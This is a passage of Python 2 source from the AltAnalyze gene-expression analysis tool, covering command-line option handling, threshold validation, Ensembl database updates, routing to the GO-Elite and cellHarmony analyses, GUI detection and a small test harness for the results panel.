print 'No species defined. Please include the species code (e.g., "--species Hs") and array type (e.g., "--arraytype exon") before proceeding.'
print '\nAlso check the printed arguments above to see if there are formatting errors, such as bad quotes.'; sys.exit()
array_type_original = array_type
#if array_type == 'gene': array_type = "3'array"
for opt, arg in options:
if opt == '--runGOElite': run_GOElite=arg
elif opt == '--outputQCPlots': visualize_qc_results=arg
elif opt == '--runLineageProfiler' or opt == '--cellHarmony' or opt == '--cellHarmonyMerge':
if string.lower(arg) == 'yes' or string.lower(arg) == 'true':
run_lineage_profiler = 'yes'
elif opt == '--elitepermut': goelite_permutations=arg
elif opt == '--method': filter_method=arg
elif opt == '--zscore': z_threshold=arg
elif opt == '--elitepval': p_val_threshold=arg
elif opt == '--num': change_threshold=arg
elif opt == '--dataToAnalyze': resources_to_analyze=arg
elif opt == '--GEelitepval': ge_pvalue_cutoffs=arg
elif opt == '--GEelitefold': ge_fold_cutoffs=arg
elif opt == '--GEeliteptype': ge_ptype=arg
elif opt == '--ORAstat': ORA_algorithm=arg
elif opt == '--returnPathways': returnPathways=arg
elif opt == '--FDR': FDR_statistic=arg
elif opt == '--dabgp': dabg_p=arg
elif opt == '--rawexp': expression_threshold=arg
elif opt == '--geneRPKM': rpkm_threshold=arg
elif opt == '--exonRPKM': exon_rpkm_threshold=arg
elif opt == '--geneExp': gene_exp_threshold=arg
elif opt == '--exonExp': exon_exp_threshold=arg
elif opt == '--groupStat': probability_statistic=arg
elif opt == '--avgallss': avg_all_for_ss=arg
elif opt == '--logexp': expression_data_format=arg
elif opt == '--inclraw': include_raw_data=arg
elif opt == '--combat': batch_effects=arg
elif opt == '--runalt': perform_alt_analysis=arg
elif opt == '--altmethod': analysis_method=arg
elif opt == '--altp': p_threshold=arg
elif opt == '--probetype': filter_probeset_types=arg
elif opt == '--altscore': alt_exon_fold_variable=arg
elif opt == '--GEcutoff': gene_expression_cutoff=arg
elif opt == '--removeIntronOnlyJunctions': remove_intronic_junctions=arg
elif opt == '--normCounts': normalize_feature_exp=arg
elif opt == '--normMatrix': normalize_gene_data=arg
elif opt == '--altpermutep': permute_p_threshold=arg
elif opt == '--altpermute': perform_permutation_analysis=arg
elif opt == '--exportnormexp': export_NI_values=arg
elif opt == '--buildExonExportFile': build_exon_bedfile = 'yes'
elif opt == '--runMarkerFinder': marker_finder = arg
elif opt == '--calcNIp': calculate_normIntensity_p=arg
elif opt == '--runMiDAS': run_MiDAS=arg
elif opt == '--analyzeAllGroups':
analyze_all_conditions=arg
if analyze_all_conditions == 'yes': analyze_all_conditions = 'all groups'
elif opt == '--GEcutoff': use_direct_domain_alignments_only=arg
elif opt == '--mirmethod': microRNA_prediction_method=arg
elif opt == '--ASfilter': filter_for_AS=arg
elif opt == '--noxhyb': xhyb_remove=arg
elif opt == '--returnAll': return_all=arg
elif opt == '--annotatedir': external_annotation_dir=arg
elif opt == '--additionalScore': additional_score=arg
elif opt == '--additionalAlgorithm': additional_algorithms=arg
elif opt == '--modelSize':
modelSize=arg
try: modelSize = int(modelSize)
except Exception: modelSize = None
elif opt == '--geneModel':
geneModel=arg # file location
if geneModel == 'no' or 'alse' in geneModel:
geneModel = False
elif opt == '--reference':
custom_reference = arg
if run_from_scratch == 'Process Feature Extraction files': ### Agilent Feature Extraction files as input for normalization
normalize_gene_data = 'quantile' ### required for Agilent
proceed = 'yes'
if returnPathways == 'no' or returnPathways == 'None':
returnPathways = None
if pipelineAnalysis == False:
proceed = 'yes'
if len(input_fastq_dir)>0:
proceed = 'yes'
run_from_scratch = 'Process RNA-seq reads'
fl = UI.ExpressionFileLocationData('','','',''); fl.setFeatureNormalization('none')
try: root_dir = root_dir
except: root_dir = output_dir
try: fl.setExpFile(expFile)
except Exception:
expFile = root_dir+'/ExpressionInput/exp.'+exp_name+'.txt'
fl.setExpFile(expFile)
fl.setArrayType(array_type)
fl.setOutputDir(root_dir)
fl.setMultiThreading(multiThreading)
exp_file_location_db={}; exp_file_location_db[exp_name]=fl
### Assign variables needed to run Kallisto from FASTQ files
if runKallisto and len(input_fastq_dir)==0:
#python AltAnalyze.py --runICGS yes --platform "RNASeq" --species Mm --column_method hopach --rho 0.4 --ExpressionCutoff 1 --FoldDiff 4 --SamplesDiffering 1 --excludeCellCycle strict --output /Users/saljh8/Desktop/Grimes/GEC14074 --expname test --fastq_dir /Users/saljh8/Desktop/Grimes/GEC14074
print 'Please include the flag "--fastq_dir" in the command-line arguments with an appropriate path';sys.exit()
elif len(input_fastq_dir)>0:
fl.setRunKallisto(input_fastq_dir)
fl.setArrayType("3'array")
array_type = "3'array"
if customFASTA!=None:
fl.setCustomFASTA(customFASTA)
if proceed == 'yes':
species_codes = UI.remoteSpeciesInfo()
### Update Ensembl Databases
if 'Official' in update_method:
file_location_defaults = UI.importDefaultFileLocations()
db_versions_vendors,db_versions = UI.remoteOnlineDatabaseVersions()
array_codes = UI.remoteArrayInfo()
UI.getOnlineDBConfig(file_location_defaults,'')
if len(species)==2:
species_names = UI.getSpeciesInfo()
species_full = species_names[species]
else: species_full = species
print 'Species name to update:',species_full
db_version_list=[]
for version in db_versions: db_version_list.append(version)
db_version_list.sort(); db_version_list.reverse(); select_version = db_version_list[0]
db_versions[select_version].sort()
print 'Ensembl version',ensembl_version
if ensembl_version != 'current':
if len(ensembl_version) < 4: ensembl_version = 'EnsMart'+ensembl_version
if ensembl_version not in db_versions:
try: UI.getOnlineEliteDatabase(file_location_defaults,ensembl_version,[species],'no',''); sys.exit()
except Exception:
### This is only for databases that aren't officially released yet (for prototyping)
print ensembl_version, 'is not a valid version of Ensembl, while',select_version, 'is.'; sys.exit()
else: select_version = ensembl_version
### Export basic species information
sc = species; db_version = ensembl_version
if sc != None:
for ad in db_versions_vendors[db_version]:
if ad.SpeciesCodes() == species_full:
for array_system in array_codes:
ac = array_codes[array_system]
compatible_species = ac.SpeciesCodes()
if ac.Manufacturer() in ad.Manufacturer() and ('expression' in ac.ArrayName() or 'RNASeq' in ac.ArrayName() or 'RNA-seq' in ac.ArrayName()):
if sc not in compatible_species: compatible_species.append(sc)
ac.setSpeciesCodes(compatible_species)
UI.exportArrayInfo(array_codes)
if species_full not in db_versions[select_version]:
print db_versions[select_version]
print species_full, ': This species is not available for this version %s of the Official database.' % select_version
else:
update_goelite_resources = 'no' ### This is handled separately below
UI.getOnlineEliteDatabase(file_location_defaults,ensembl_version,[species],update_goelite_resources,'');
### Attempt to download additional Ontologies and GeneSets
if additional_resources[0] != None: ### Indicates that the user requested the download of addition GO-Elite resources
try:
from build_scripts import GeneSetDownloader
print 'Adding supplemental GeneSet and Ontology Collections'
if 'all' in additional_resources:
additionalResources = UI.importResourceList() ### Get's all additional possible resources
else: additionalResources = additional_resources
GeneSetDownloader.buildAccessoryPathwayDatabases([species],additionalResources,'yes')
print 'Finished adding additional analysis resources.'
except Exception:
print 'Download error encountered for additional Ontologies and GeneSets...\nplease try again later.'
status = UI.verifyLineageProfilerDatabases(species,'command-line')
if status == False:
print 'Please note: LineageProfiler not currently supported for this species...'
if array_type == 'junction' or array_type == 'RNASeq': ### Download junction databases
try: UI.checkForLocalArraySupport(species,array_type,specific_array_type,'command-line')
except Exception:
print 'Please install a valid gene database before proceeding.\n'
print 'For example: python AltAnalyze.py --species Hs --update Official --version EnsMart72';sys.exit()
status = UI.verifyLineageProfilerDatabases(species,'command-line')
print "Finished adding database"
sys.exit()
try:
#print ge_fold_cutoffs,ge_pvalue_cutoffs, change_threshold, resources_to_analyze, goelite_permutations, p_val_threshold, z_threshold
change_threshold = int(change_threshold)-1
goelite_permutations = int(goelite_permutations);change_threshold = change_threshold
p_val_threshold = float(p_val_threshold); z_threshold = float(z_threshold)
if ORA_algorithm == 'Fisher Exact Test':
goelite_permutations = 'FisherExactTest'
except Exception,e:
print e
print 'One of the GO-Elite input values is inapporpriate. Please review and correct.';sys.exit()
if run_GOElite == None or run_GOElite == 'no': goelite_permutations = 'NA' ### This haults GO-Elite from running
else:
if output_dir == None:
print "\nPlease specify an output directory using the flag --output"; sys.exit()
try: expression_threshold = float(expression_threshold)
except Exception: expression_threshold = 1
try: dabg_p = float(dabg_p)
except Exception: dabg_p = 1 ### Occurs for RNASeq
if microRNA_prediction_method == 'two or more': microRNA_prediction_method = 'multiple'
else: microRNA_prediction_method = 'any'
### Run GO-Elite directly from user supplied input and denominator ID folders (outside of the normal workflows)
if run_GOElite == 'yes' and pipelineAnalysis == False and '--runGOElite' in arguments:# and denom_file_dir != None:
#python AltAnalyze.py --input "/Users/nsalomonis/Desktop/Mm_sample/input_list_small" --runGOElite yes --denom "/Users/nsalomonis/Desktop/Mm_sample/denominator" --mod Ensembl --species Mm
"""if denom_file_dir == None:
print 'Please include a folder containing a valid denominator ID list for the input ID sets.'; sys.exit()"""
try:
if output_dir==None:
### Set output to the same directory or parent if none selected
i = -1 ### 1 directory up
output_dir = string.join(string.split(input_file_dir,'/')[:i],'/')
file_dirs = input_file_dir, denom_file_dir, output_dir
import GO_Elite
if ORA_algorithm == 'Fisher Exact Test':
goelite_permutations = 'FisherExactTest'
goelite_var = species,mod,goelite_permutations,filter_method,z_threshold,p_val_threshold,change_threshold,resources_to_analyze,returnPathways,file_dirs,''
GO_Elite.remoteAnalysis(goelite_var,'non-UI',Multi=mlp)
sys.exit()
except Exception:
print traceback.format_exc()
print "Unexpected error encountered. Please see log file."; sys.exit()
if run_lineage_profiler == 'yes':
status = UI.verifyLineageProfilerDatabases(species,'command-line')
if status == False:
print 'Please note: LineageProfiler not currently supported for this species...'
if run_lineage_profiler == 'yes' and input_file_dir != None and pipelineAnalysis == False and ('--runLineageProfiler' in arguments or '--cellHarmony' in arguments or '--cellHarmonyMerge' in arguments):
#python AltAnalyze.py --input "/Users/arrays/test.txt" --runLineageProfiler yes --vendor Affymetrix --platform "3'array" --species Mm --output "/Users/nsalomonis/Merrill"
#python AltAnalyze.py --input "/Users/qPCR/samples.txt" --runLineageProfiler yes --geneModel "/Users/qPCR/models.txt" --reference "Users/qPCR/reference_profiles.txt"
if array_type==None:
print "Please include a platform name (e.g., --platform RNASeq)";sys.exit()
if species==None:
print "Please include a species name (e.g., --species Hs)";sys.exit()
try:
status = UI.verifyLineageProfilerDatabases(species,'command-line')
except ValueError:
### Occurs due to if int(gene_database[-2:]) < 65: - ValueError: invalid literal for int() with base 10: ''
print '\nPlease install a valid gene database before proceeding.\n'
print 'For example: python AltAnalyze.py --species Hs --update Official --version EnsMart72\n';sys.exit()
if status == False:
print 'Please note: LineageProfiler not currently supported for this species...';sys.exit()
try:
FoldDiff=1.5
performDiffExp=True
pval = 0.05
adjp = True
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--fold': FoldDiff=float(arg)
elif opt == '--pval': pval = float(arg)
elif opt == '--adjp': adjp = arg
elif opt == '--performDiffExp': performDiffExp = arg
elif opt == '--centerMethod': CenterMethod = arg
elif opt == '--labels': labels = arg
elif opt == '--genes': genes = arg
elif opt == '--referenceFull': referenceFull = arg
fl = UI.ExpressionFileLocationData('','','','')
fl.setSpecies(species)
fl.setVendor(manufacturer)
fl.setPlatformType(array_type)
fl.setCompendiumType('protein_coding')
if '--cellHarmony' in arguments:
fl.setClassificationAnalysis('cellHarmony')
fl.setPearsonThreshold(PearsonThreshold)
fl.setReturnCentroids(returnCentroids)
fl.setPeformDiffExpAnalysis(performDiffExp)
fl.setUseAdjPvalue(adjp)
fl.setPvalThreshold(pval)
fl.setFoldCutoff(FoldDiff)
fl.setLabels(labels)
else:
fl.setClassificationAnalysis('LineageProfiler')
#fl.setCompendiumType('AltExon')
fl.setCompendiumPlatform(array_type)
try: expr_input_dir
except Exception: expr_input_dir = input_file_dir
if '--cellHarmonyMerge' in arguments:
ICGS_files=[]
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--input' or opt == '--i':
input_file = verifyPath(arg)
ICGS_files.append(input_file)
import LineageProfilerIterate
print 'center method =',CenterMethod
LineageProfilerIterate.createMetaICGSResults(ICGS_files,output_dir,CenterMethod=CenterMethod,species=species,PearsonThreshold=PearsonThreshold)
#except: LineageProfilerIterate.createMetaICGSResults(ICGS_files,output_dir,CenterMethod=CenterMethod)
sys.exit()
try: CenterMethod=CenterMethod
except: CenterMethod='community'
""" Only align sparse matrix files and skip other analyses """
if len(genes)>0 and ('h5' in custom_reference or 'mtx' in custom_reference):
fl.set_reference_exp_file(custom_reference)
custom_reference = genes
if referenceFull != None:
fl.set_reference_exp_file(referenceFull)
UI.remoteLP(fl, expr_input_dir, manufacturer, custom_reference, geneModel, None, modelSize=modelSize, CenterMethod=CenterMethod) #,display=display
#graphic_links = ExpressionBuilder.remoteLineageProfiler(fl,input_file_dir,array_type,species,manufacturer)
print_out = 'Alignments and images saved to the folder "DataPlots" in the input file folder.'
print print_out
except Exception:
print traceback.format_exc()
print_out = 'Analysis error occured...\nplease see warning printouts.'
print print_out
sys.exit()
if array_type == 'junction' or array_type == 'RNASeq': ### Download junction databases
try: UI.checkForLocalArraySupport(species,array_type,specific_array_type,'command-line')
except Exception:
print 'Please install a valid gene database before proceeding.\n'
print 'For example: python AltAnalyze.py --species Hs --update Official --version EnsMart72';sys.exit()
probeset_types = ['full','core','extended']
if return_all == 'yes': ### Perform no alternative exon filtering when annotating existing FIRMA or MADS results
dabg_p = 1; expression_threshold = 1; p_threshold = 1; alt_exon_fold_variable = 1
gene_expression_cutoff = 10000; filter_probeset_types = 'full'; exon_exp_threshold = 1; rpkm_threshold = 0
gene_exp_threshold = 1; exon_rpkm_threshold = 0
if array_type == 'RNASeq':
gene_exp_threshold = 0
else:
if array_type != "3'array":
try:
p_threshold = float(p_threshold); alt_exon_fold_variable = float(alt_exon_fold_variable)
expression_threshold = float(expression_threshold); gene_expression_cutoff = float(gene_expression_cutoff)
dabg_p = float(dabg_p); additional_score = float(additional_score)
gene_expression_cutoff = float(gene_expression_cutoff)
except Exception:
try: gene_expression_cutoff = float(gene_expression_cutoff)
except Exception: gene_expression_cutoff = 0
try: rpkm_threshold = float(rpkm_threshold)
except Exception: rpkm_threshold = -1
try: exon_exp_threshold = float(exon_exp_threshold)
except Exception: exon_exp_threshold = 0
try: gene_exp_threshold = float(gene_exp_threshold)
except Exception: gene_exp_threshold = 0
try: exon_rpkm_threshold = float(exon_rpkm_threshold)
except Exception: exon_rpkm_threshold = 0
if filter_probeset_types not in probeset_types and array_type == 'exon':
print "Invalid probeset-type entered:",filter_probeset_types,'. Must be "full", "extended" or "core"'; sys.exit()
elif array_type == 'gene' and filter_probeset_types == 'NA': filter_probeset_types = 'core'
if dabg_p > 1 or dabg_p <= 0:
print "Invalid DABG p-value entered:",dabg_p,'. Must be > 0 and <= 1'; sys.exit()
if expression_threshold <1:
print "Invalid expression threshold entered:",expression_threshold,'. Must be > 1'; sys.exit()
if p_threshold > 1 or p_threshold <= 0:
print "Invalid alternative exon p-value entered:",p_threshold,'. Must be > 0 and <= 1'; sys.exit()
if alt_exon_fold_variable < 1 and analysis_method != 'ASPIRE' and analysis_method != 'MultiPath-PSI':
print "Invalid alternative exon threshold entered:",alt_exon_fold_variable,'. Must be > 1'; sys.exit()
if gene_expression_cutoff < 1:
print "Invalid gene expression threshold entered:",gene_expression_cutoff,'. Must be > 1'; sys.exit()
if additional_score < 1:
print "Invalid additional score threshold entered:",additional_score,'. Must be > 1'; sys.exit()
if array_type == 'RNASeq':
if rpkm_threshold < 0:
print "Invalid gene RPKM threshold entered:",rpkm_threshold,'. Must be >= 0'; sys.exit()
if exon_exp_threshold < 1:
print "Invalid exon expression threshold entered:",exon_exp_threshold,'. Must be > 1'; sys.exit()
if exon_rpkm_threshold < 0:
print "Invalid exon RPKM threshold entered:",exon_rpkm_threshold,'. Must be >= 0'; sys.exit()
if gene_exp_threshold < 1:
print "Invalid gene expression threshold entered:",gene_exp_threshold,'. Must be > 1'; sys.exit()
if 'FIRMA' in additional_algorithms and array_type == 'RNASeq':
print 'FIRMA is not an available option for RNASeq... Changing this to splicing-index.'
additional_algorithms = 'splicing-index'
additional_algorithms = UI.AdditionalAlgorithms(additional_algorithms); additional_algorithms.setScore(additional_score)
if array_type == 'RNASeq':
try:
if 'CEL' in run_from_scratch: run_from_scratch = 'Process RNA-seq reads'
if build_exon_bedfile == 'yes': run_from_scratch = 'buildExonExportFiles'
manufacturer = 'RNASeq'
except Exception:
### When technically 3'array format
array_type = "3'array"
if run_from_scratch == 'Process AltAnalyze filtered': expression_data_format = 'log' ### This is switched to log no matter what, after initial import and analysis of CEL or BED files
### These variables are modified from the defaults in the module UI as below
excludeNonExpExons = True
if avg_all_for_ss == 'yes': avg_all_for_ss = 'yes'
elif 'all exon aligning' in avg_all_for_ss or 'known exons' in avg_all_for_ss or 'expressed exons' in avg_all_for_ss:
if 'known exons' in avg_all_for_ss and array_type == 'RNASeq': excludeNonExpExons = False
avg_all_for_ss = 'yes'
else: avg_all_for_ss = 'no'
if run_MiDAS == 'NA': run_MiDAS = 'no'
if perform_alt_analysis == 'yes': perform_alt_analysis = 'yes'
elif perform_alt_analysis == 'expression': perform_alt_analysis = 'expression'
elif perform_alt_analysis == 'just expression': perform_alt_analysis = 'expression'
elif perform_alt_analysis == 'no': perform_alt_analysis = 'expression'
elif platform != "3'array": perform_alt_analysis = 'both'
if systemToUse != None: array_type = systemToUse
try: permute_p_threshold = float(permute_p_threshold)
except Exception: permute_p_threshold = permute_p_threshold
### Store variables for AltAnalyzeMain
expr_var = species,array_type,manufacturer,constitutive_source,dabg_p,expression_threshold,avg_all_for_ss,expression_data_format,include_raw_data,run_from_scratch,perform_alt_analysis
alt_var = analysis_method,p_threshold,filter_probeset_types,alt_exon_fold_variable,gene_expression_cutoff,remove_intronic_junctions,permute_p_threshold,perform_permutation_analysis, export_NI_values, analyze_all_conditions
additional_var = calculate_normIntensity_p, run_MiDAS, use_direct_domain_alignments_only, microRNA_prediction_method, filter_for_AS, additional_algorithms
goelite_var = ge_fold_cutoffs,ge_pvalue_cutoffs,ge_ptype,filter_method,z_threshold,p_val_threshold,change_threshold,resources_to_analyze,goelite_permutations,mod,returnPathways
if run_from_scratch == 'buildExonExportFiles':
fl = UI.ExpressionFileLocationData('','','',''); fl.setExonBedBuildStatus('yes'); fl.setFeatureNormalization('none')
fl.setCELFileDir(cel_file_dir); fl.setArrayType(array_type); fl.setOutputDir(output_dir)
fl.setMultiThreading(multiThreading)
exp_file_location_db={}; exp_file_location_db[dataset_name]=fl; parent_dir = output_dir
perform_alt_analysis = 'expression'
if run_from_scratch == 'Process Expression file':
if len(input_exp_file)>0:
if groups_file != None and comps_file != None:
if 'exp.' in input_exp_file: new_exp_file = input_exp_file
else:
new_exp_file = export.findParentDir(input_exp_file)+'exp.'+export.findFilename(input_exp_file)
if 'ExpressionInput' not in new_exp_file:
### This expression file is not currently used (could make it the default after copying to this location)
if output_dir[-1] != '/' and output_dir[-1] != '\\':
output_dir += '/'
new_exp_file = output_dir+'ExpressionInput/'+export.findFilename(new_exp_file)
try: export.copyFile(input_exp_file, new_exp_file)
except Exception: print 'Expression file already present in target location.'
try: export.copyFile(groups_file, string.replace(new_exp_file,'exp.','groups.'))
except Exception: print 'Groups file already present in target location OR bad input path.'
try: export.copyFile(comps_file, string.replace(new_exp_file,'exp.','comps.'))
except Exception: print 'Comparison file already present in target location OR bad input path.'
groups_file = string.replace(new_exp_file,'exp.','groups.')
comps_file = string.replace(new_exp_file,'exp.','comps.')
input_exp_file = new_exp_file
if verifyGroupFileFormat(groups_file) == False:
print "\nWarning! The format of your groups file is not correct. For details, see:\nhttp://altanalyze.readthedocs.io/en/latest/ManualGroupsCompsCreation\n"
sys.exit()
try:
cel_files, array_linker_db = ExpressionBuilder.getArrayHeaders(input_exp_file)
if len(input_stats_file)>1: ###Make sure the files have the same arrays and order first
cel_files2, array_linker_db2 = ExpressionBuilder.getArrayHeaders(input_stats_file)
if cel_files2 != cel_files:
print "The probe set p-value file:\n"+input_stats_file+"\ndoes not have the same array order as the\nexpression file. Correct before proceeding."; sys.exit()
except Exception: print '\nWARNING...Expression file not found: "'+input_exp_file+'"\n\n'; sys.exit()
exp_name = string.replace(exp_name,'exp.',''); dataset_name = exp_name; exp_name = string.replace(exp_name,'.txt','')
groups_name = 'ExpressionInput/groups.'+dataset_name; comps_name = 'ExpressionInput/comps.'+dataset_name
groups_file_dir = output_dir+'/'+groups_name; comps_file_dir = output_dir+'/'+comps_name
groups_found = verifyFile(groups_file_dir)
comps_found = verifyFile(comps_file_dir)
if ((groups_found != 'found' or comps_found != 'found') and analyze_all_conditions != 'all groups') or (analyze_all_conditions == 'all groups' and groups_found != 'found'):
files_exported = UI.predictGroupsAndComps(cel_files,output_dir,exp_name)
if files_exported == 'yes': print "AltAnalyze inferred a groups and comps file from the CEL file names."
elif run_lineage_profiler == 'yes' and input_file_dir != None and pipelineAnalysis == False and ('--runLineageProfiler' in arguments or '--cellHarmony' in arguments): pass
else: print '...groups and comps files not found. Create before running AltAnalyze in command line mode.';sys.exit()
fl = UI.ExpressionFileLocationData(input_exp_file,input_stats_file,groups_file_dir,comps_file_dir)
dataset_name = exp_name
if analyze_all_conditions == "all groups":
try: array_group_list,group_db = UI.importArrayGroupsSimple(groups_file_dir,cel_files)
except Exception:
print '...groups and comps files not found. Create before running AltAnalyze in command line mode.';sys.exit()
print len(group_db), 'groups found'
if len(group_db) == 2: analyze_all_conditions = 'pairwise'
exp_file_location_db={}; exp_file_location_db[exp_name]=fl
elif run_from_scratch == 'Process CEL files' or run_from_scratch == 'Process RNA-seq reads' or run_from_scratch == 'Process Feature Extraction files':
if groups_file != None and comps_file != None:
try: shutil.copyfile(groups_file, string.replace(exp_file_dir,'exp.','groups.'))
except Exception: print 'Groups file already present in target location OR bad input path.'
try: shutil.copyfile(comps_file, string.replace(exp_file_dir,'exp.','comps.'))
except Exception: print 'Comparison file already present in target location OR bad input path.'
stats_file_dir = string.replace(exp_file_dir,'exp.','stats.')
groups_file_dir = string.replace(exp_file_dir,'exp.','groups.')
comps_file_dir = string.replace(exp_file_dir,'exp.','comps.')
groups_found = verifyFile(groups_file_dir)
comps_found = verifyFile(comps_file_dir)
if ((groups_found != 'found' or comps_found != 'found') and analyze_all_conditions != 'all groups') or (analyze_all_conditions == 'all groups' and groups_found != 'found'):
if mappedExonAnalysis: pass
elif len(input_fastq_dir)<0: ### Don't check for FASTQ to allow for fast expression quantification even if groups not present
files_exported = UI.predictGroupsAndComps(cel_files,output_dir,exp_name)
if files_exported == 'yes': print "AltAnalyze inferred a groups and comps file from the CEL file names."
#else: print '...groups and comps files not found. Create before running AltAnalyze in command line mode.';sys.exit()
fl = UI.ExpressionFileLocationData(exp_file_dir,stats_file_dir,groups_file_dir,comps_file_dir)
exp_file_location_db={}; exp_file_location_db[dataset_name]=fl
parent_dir = output_dir ### interchangable terms (parent_dir used with expression file import)
if analyze_all_conditions == "all groups":
array_group_list,group_db = UI.importArrayGroupsSimple(groups_file_dir,cel_files)
UI.exportGroups(exp_file_location_db,array_group_list)
print len(group_db), 'groups found'
if len(group_db) == 2: analyze_all_conditions = 'pairwise'
try: fl.setRunKallisto(input_fastq_dir)
except Exception: pass
elif run_from_scratch == 'Process AltAnalyze filtered':
if '.txt' in input_filtered_dir: ### Occurs if the user tries to load a specific file
dirs = string.split(input_filtered_dir,'/')
input_filtered_dir = string.join(dirs[:-1],'/')
fl = UI.ExpressionFileLocationData('','','',''); dataset_name = 'filtered-exp_dir'
dirs = string.split(input_filtered_dir,'AltExpression'); parent_dir = dirs[0]
exp_file_location_db={}; exp_file_location_db[dataset_name]=fl
for dataset in exp_file_location_db:
fl = exp_file_location_db[dataset_name]
file_location_defaults = UI.importDefaultFileLocations()
apt_location = UI.getAPTLocations(file_location_defaults,run_from_scratch,run_MiDAS)
fl.setAPTLocation(apt_location)
if run_from_scratch == 'Process CEL files':
if xhyb_remove == 'yes' and (array_type == 'gene' or array_type == 'junction'): xhyb_remove = 'no' ### This is set when the user mistakenly selects exon array, initially
fl.setInputCDFFile(input_cdf_file); fl.setCLFFile(clf_file); fl.setBGPFile(bgp_file); fl.setXHybRemoval(xhyb_remove)
fl.setCELFileDir(cel_file_dir); fl.setArrayType(array_type_original); fl.setOutputDir(output_dir)
elif run_from_scratch == 'Process RNA-seq reads':
fl.setCELFileDir(cel_file_dir); fl.setOutputDir(output_dir)
elif run_from_scratch == 'Process Feature Extraction files':
fl.setCELFileDir(cel_file_dir); fl.setOutputDir(output_dir)
fl = exp_file_location_db[dataset]; fl.setRootDir(parent_dir)
try: apt_location = fl.APTLocation()
except Exception: apt_location = ''
root_dir = fl.RootDir(); fl.setExonBedBuildStatus(build_exon_bedfile)
fl.setMarkerFinder(marker_finder)
fl.setFeatureNormalization(normalize_feature_exp)
fl.setNormMatrix(normalize_gene_data)
fl.setProbabilityStatistic(probability_statistic)
fl.setProducePlots(visualize_qc_results)
fl.setPerformLineageProfiler(run_lineage_profiler)
fl.setCompendiumType(compendiumType)
fl.setCompendiumPlatform(compendiumPlatform)
fl.setVendor(manufacturer)
try: fl.setFDRStatistic(FDR_statistic)
except Exception: pass
fl.setAnalysisMode('commandline')
fl.setBatchEffectRemoval(batch_effects)
fl.setChannelToExtract(channel_to_extract)
fl.setMultiThreading(multiThreading)
try: fl.setExcludeLowExpressionExons(excludeNonExpExons)
except Exception: fl.setExcludeLowExpressionExons(True)
if 'other' in manufacturer or 'Other' in manufacturer:
### For data without a primary array ID key
manufacturer = "other:3'array"
fl.setVendor(manufacturer)
if array_type == 'RNASeq': ### Post version 2.0, add variables in fl rather than below
fl.setRPKMThreshold(rpkm_threshold)
fl.setExonExpThreshold(exon_exp_threshold)
fl.setGeneExpThreshold(gene_exp_threshold)
fl.setExonRPKMThreshold(exon_rpkm_threshold)
fl.setJunctionExpThreshold(expression_threshold)
fl.setExonMapFile(exonMapFile)
fl.setPlatformType(platformType)
### Verify database presence
try: dirs = unique.read_directory('/AltDatabase')
except Exception: dirs=[]
if species not in dirs:
print '\n'+species,'species not yet installed. Please install before proceeding (e.g., "python AltAnalyze.py --update Official --species',species,'--version EnsMart75").'
global commandLineMode; commandLineMode = 'yes'
AltAnalyzeMain(expr_var, alt_var, goelite_var, additional_var, exp_file_location_db,None)
else:
print traceback.format_exc()
print 'Insufficient Flags entered (requires --species and --output)'
def cleanUpCommandArguments():
    ### Needed on PC
    # Sanity-check sys.argv for Windows-style paths: a drive colon appearing
    # anywhere other than the second character of a value suggests a
    # mis-quoted argument, in which case we abort with a message.
    command_args = string.join(sys.argv,' ')
    arguments = string.split(command_args,' --')
    for argument in arguments:
        """
        argument_list = string.split(argument,' ')
        if len(argument_list)>2:
            filename = string.join(argument_list[1:],' ')
            argument = argument_list[0]+' '+string.replace(filename,' ','$$$')
        """
        argument_list = string.split(argument,' ')
        #argument = string.join(re.findall(r"\w",argument),'')
        if ':' in argument: ### Windows OS
            # Position of ':' within the argument's value (second token).
            z = string.find(argument_list[1],':')
            if z!= -1 and z!=1: ### Hence, it is in the argument but not at the second position
                # NOTE(review): the check is about colon position, but the
                # message mentions parentheses -- confirm the wording.
                print 'Illegal parentheses found. Please re-type these and re-run.'; sys.exit()
def runCommandLineVersion():
    ### This code had to be moved to a separate function to prevent iterative runs upon AltAnalyze.py re-import
    # Entry point for command-line execution (Python 2). When --GUI is
    # supplied, relaunches the Tkinter setup with the prior parameters;
    # otherwise dispatches to commandLineRun().
    command_args = string.join(sys.argv,' ')
    #try: cleanUpCommandArguments()
    #except Exception: null=[]
    #print 3,[sys.argv],
    if len(sys.argv[1:])>0 and '--' in command_args:
        if '--GUI' in command_args:
            ### Hard-restart of AltAnalyze while preserving the prior parameters
            command_arguments = string.split(command_args,' --')
            if len(command_arguments)>2:
                # Values use '__' to encode spaces across the restart; decode here.
                command_arguments = map(lambda x: string.split(x,' '),command_arguments)
                command_arguments = map(lambda (x,y): (x,string.replace(y,'__',' ')),command_arguments[2:])
                selected_parameters = [command_arguments[0][1]]
                user_variables={}
                for (o,v) in command_arguments: user_variables[o]=v
                AltAnalyzeSetup((selected_parameters,user_variables))
            else:
                AltAnalyzeSetup('no') ### a trick to get back to the main page of the GUI (if AltAnalyze has Tkinter conflict)
        try:
            commandLineRun()
        except Exception:
            print traceback.format_exc()
###### Determine Command Line versus GUI Control ######
# If real command-line flags are present, skip the GUI imports entirely;
# otherwise probe for Tkinter/Pmw so the GUI can be launched later.
command_args = string.join(sys.argv,' ')
if len(sys.argv[1:])>1 and '-' in command_args: null=[]
else:
    try:
        import Tkinter
        from Tkinter import *
        from visualization_scripts import PmwFreeze
        import tkFileDialog
        from tkFont import Font
        use_Tkinter = 'yes'
    # NOTE(review): use_Tkinter is set to 'yes' even when the import fails --
    # confirm this fallback is intentional (the message suggests degraded output).
    except ImportError: use_Tkinter = 'yes'; print "\nPmw or Tkinter not found... Tkinter print out not available";
def testResultsPanel():
    # Developer-only harness: fabricates graphic links and a summary_db so the
    # SummaryResultsWindow can be exercised without running a real analysis.
    from visualization_scripts import QC
    file = "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/3'Array/Merrill/ExpressionInput/exp.test.txt"
    #QC.outputArrayQC(file)
    # Globals expected by the UI module are seeded with placeholder values.
    global root; root = Tk()
    global pathway_permutations; pathway_permutations = 'NA'
    global log_file; log_file = 'null.txt'
    global array_type; global explicit_data_type
    global run_GOElite; run_GOElite = 'run-immediately'
    explicit_data_type = 'exon-only'
    array_type = 'RNASeq'
    fl = UI.ExpressionFileLocationData('','','','')
    # Several duplicate entries on purpose: enough thumbnails to paginate.
    graphic_links = []
    graphic_links.append(['PCA','PCA.png'])
    graphic_links.append(['HC','HC.png'])
    graphic_links.append(['PCA1','PCA.png'])
    graphic_links.append(['HC1','HC.png'])
